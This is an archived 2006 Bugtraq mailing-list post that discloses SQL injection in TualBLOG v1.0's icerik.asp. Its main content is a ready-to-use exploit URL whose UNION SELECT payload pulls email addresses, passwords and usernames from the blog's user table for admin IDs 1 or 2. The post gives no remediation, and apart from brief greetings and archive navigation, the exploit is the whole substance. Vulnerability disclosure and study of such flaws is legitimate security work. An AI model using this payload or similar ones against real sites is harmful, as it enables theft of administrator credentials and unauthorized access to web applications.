[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

TualBLOG v 1.0 multiple sql injection

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: TualBLOG v 1.0 multiple sql injection
From: dj_remix_20@xxxxxxxxxxx
Date: 13 Sep 2006 14:04:38 -0000

# BiyoSecurity.Org

# script name : TualBLOG v 1.0 

# Risk : High

# Regards : Dj ReMix

# Thanks : Korsan , Liz0zim

# Vulnerable file : icerik.asp

exp :

http://site.com/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+from+tbl_uye+where+uyeno=1


uyeno = 1 or 2( Admin ID )

Bye :=)

Prev by Date: [eVuln] NX5Linkx Multiple Vulnerabilities
Next by Date: [ GLSA 200609-08 ] xine-lib: Buffer overflows
Previous by thread: [eVuln] NX5Linkx Multiple Vulnerabilities
Next by thread: [ GLSA 200609-08 ] xine-lib: Buffer overflows
Index(es):
- Date
- Thread